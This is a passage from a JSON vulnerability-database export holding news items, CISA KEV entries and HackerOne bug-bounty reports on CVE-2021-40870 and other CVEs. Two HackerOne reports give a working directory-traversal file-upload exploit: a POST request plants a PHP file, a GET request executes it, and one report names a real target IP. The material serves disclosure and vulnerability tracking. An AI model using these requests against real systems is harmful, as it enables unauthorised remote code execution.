infrastructure and support features such as workload balancing, troubleshooting, and compliance management.\n\nEgor Dimitrenko, a security researcher with Positive Technologies, has been credited with reporting all three flaws.\n\n\"The main risk is that administrator privileges allow attackers to exploit the second vulnerability\u2014CVE-2021-21983 (an arbitrary file write flaw, scored 7.2), which allows executing any commands on the server,\" Dimitrenko [said](<https://www.ptsecurity.com/ww-en/about/news/vmware-fixes-dangerous-vulnerabilities-in-software-for-infrastructure-monitoring-discovered-by-positive-technologies/>). \"The combination of two security flaws makes the situation even more dangerous, as it allows an unauthorized attacker to obtain control over the server and move laterally within the infrastructure.\"\n\nVMware has released patches for vRealize Operations Manager versions 7.0.0, 7.5.0, 8.0.1, 8.1.1, 8.2.0 and 8.3.0. The company has also published workarounds to mitigate the risks associated with the flaws in scenarios where the patch cannot be installed or is not available.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-07T08:03:00", "type": "thn", "title": "Critical Auth Bypass Bug Found in VMware Data Center Security Product", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21982", "CVE-2021-21983"], "modified": "2021-04-07T09:38:17", "id": "THN:4640BEB83FE3611B6867B05878F52F0D", "href": "https://thehackernews.com/2021/04/critical-auth-bypass-bug-found-in.html", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "hackerone": [{"lastseen": "2023-05-23T16:49:14", "bounty": 0.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has an SSL certificate pointing to Informatica LLC. 
\n``curl -kvI https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588``\n\nOutput\n\n```\n Server certificate:\n* subject: \u2588\u2588\u2588\u2588\u2588\u2588\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThen retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: \u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\n<tr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/v1/1.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td class=\"v\">Redwood City </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Informatica LLC </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_OU </td><td class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td 
class=\"v\">\u2588\u2588\u2588\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">HydrantID (Avalanche Cloud Corporation) </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">HydrantID SSL ICA G2 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">\u2588\u2588\u2588 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://vulners.com/cve/CVE-2021-40870", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-06T04:33:57", "type": "hackerone", "title": "Informatica: CVE-2021-40870 in [\u2588\u2588\u2588]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-11-15T09:10:36", "id": "H1:1360593", "href": "https://hackerone.com/reports/1360593", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2023-05-23T16:49:42", "bounty": 1760.0, "description": "An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.\n\nThe IP has an SSL certificate pointing to ElasticSearch. \n``curl -kv https://52.204.160.31``\n\nOutput\n\n```\n Server certificate:\n* subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co\n```\n\n\n## Steps To Reproduce\n\nFirst, run this request:\n```\nPOST /v1/backend1 HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\nConnection: close\nContent-Length: 136\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\nCID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>\n\n```\nThen retrieve the content from file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``\n\n```\nGET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1\nHost: 52.204.160.31\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n```\nWhich is basically the output of the phpinfo function:\n\nResponse (truncated): \n```\ntr class=\"h\"><th>Variable</th><th>Value</th></tr>\n<tr><td class=\"e\">SCRIPT_URL </td><td class=\"v\">/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">SCRIPT_URI </td><td class=\"v\">https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>\n<tr><td class=\"e\">HTTPS </td><td class=\"v\">on </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_ST </td><td class=\"v\">California </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_L </td><td 
class=\"v\">Mountain View </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_O </td><td class=\"v\">Elasticsearch, Inc. </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN_CN </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_C </td><td class=\"v\">US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_O </td><td class=\"v\">DigiCert Inc </td></tr>\n<tr><td class=\"e\">SSL_SERVER_I_DN_CN </td><td class=\"v\">DigiCert SHA2 Secure Server CA </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_0 </td><td class=\"v\">*.elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_SERVER_SAN_DNS_1 </td><td class=\"v\">elasticit.co </td></tr>\n<tr><td class=\"e\">SSL_VERSION_INTERFACE </td><td class=\"v\">mod_ssl/2.4.39 </td></tr>\n<tr><td class=\"e\">SSL_VERSION_LIBRARY </td><td class=\"v\">OpenSSL/1.1.1b </td></tr>\n<tr><td class=\"e\">SSL_PROTOCOL </td><td class=\"v\">TLSv1.2 </td></tr>\n<tr><td class=\"e\">SSL_SECURE_RENEG </td><td class=\"v\">true </td></tr>\n<tr><td class=\"e\">SSL_COMPRESS_METHOD </td><td class=\"v\">NULL </td></tr>\n<tr><td class=\"e\">SSL_CIPHER </td><td class=\"v\">ECDHE-RSA-AES128-GCM-SHA256 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_EXPORT </td><td class=\"v\">false </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_USEKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CIPHER_ALGKEYSIZE </td><td class=\"v\">128 </td></tr>\n<tr><td class=\"e\">SSL_CLIENT_VERIFY </td><td class=\"v\">NONE </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_VERSION </td><td class=\"v\">3 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_M_SERIAL </td><td class=\"v\">093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_START </td><td class=\"v\">Mar 20 00:00:00 2020 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_V_END </td><td class=\"v\">Mar 25 12:00:00 2022 GMT </td></tr>\n<tr><td class=\"e\">SSL_SERVER_S_DN </td><td class=\"v\">CN=*.elasticit.co,O=Elasticsearch\\, Inc.,L=Mountain View,ST=California,C=US </td></tr>\n<tr><td 
class=\"e\">SSL_SERVER_I_DN </td><td class=\"v\">CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_KEY </td><td class=\"v\">rsaEncryption </td></tr>\n<tr><td class=\"e\">SSL_SERVER_A_SIG </td><td class=\"v\">sha256WithRSAEncryption </td></tr>\n<tr><td class=\"e\">SSL_SESSION_ID </td><td class=\"v\">9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>\n<tr><td class=\"e\">SSL_SESSION_RESUMED </td><td class=\"v\">Initial </td></tr>\n<tr><td class=\"e\">HTTP_HOST </td><td class=\"v\">52.204.160.31 </td></tr>\n<tr><td class=\"e\">HTTP_USER_AGENT </td><td class=\"v\">Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>\n<tr><td class=\"e\">HTTP_CONNECTION </td><td class=\"v\">close </td></tr>\n ```\n\n## Impact\n\n- An unauthenticated, 3rd-party attacker or adversary can execute remote code\n \n### Supporting Material/References\nhttps://vulners.com/cve/CVE-2021-40870", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-01T20:20:56", "type": "hackerone", "title": "Elastic: CVE-2021-40870 on [52.204.160.31]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2021-10-06T16:06:41", "id": "H1:1356845", "href": "https://hackerone.com/reports/1356845", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-05-23T17:17:33", "description": "Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Aviatrix Controller Unrestricted Upload of File", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40870"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-40870", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "In affected versions of the october/system package an attacker can request an account password reset and then gain access to the account using a specially crafted request.", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "October CMS Improper Authentication", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32648"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-32648", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25297", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25298", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2023-05-27T15:17:54", "description": "The Traffic Management Microkernel of BIG-IP ASM Risk Engine has a buffer overflow vulnerability, leading to a bypassing of URL-based access controls.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "F5 BIG-IP Traffic Management Microkernel Buffer Overflow", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22991"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-22991", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Nagios XI contains a vulnerability which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Nagios XI OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-25296", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:37:18", "description": "A remote code/command injection vulnerability was discovered in one of the example DAGs shipped with Airflow.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Apache Airflow Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": 
false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-11978", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "In this vulnerability, an attacker can send a malicious payload that will exploit the name parameter. After successful exploitation, attackers can execute remote.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "System Information Library for Node.JS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-21315", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-05T15:37:18", "description": "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 
"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Apache Airflow's Experimental API Authentication Bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13927"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2020-13927", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:17:33", "description": "Microsoft Exchange Server contains an information disclosure vulnerability which can allow an unauthenticated attacker to steal email traffic from target.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-01-18T00:00:00", "type": "cisa_kev", "title": "Microsoft Exchange Server Information Disclosure", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2022-01-18T00:00:00", "id": "CISA-KEV-CVE-2021-33766", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T15:17:54", "description": "Server Side Request Forgery (SSRF) in vRealize Operations Manager API prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API to perform a SSRF attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", 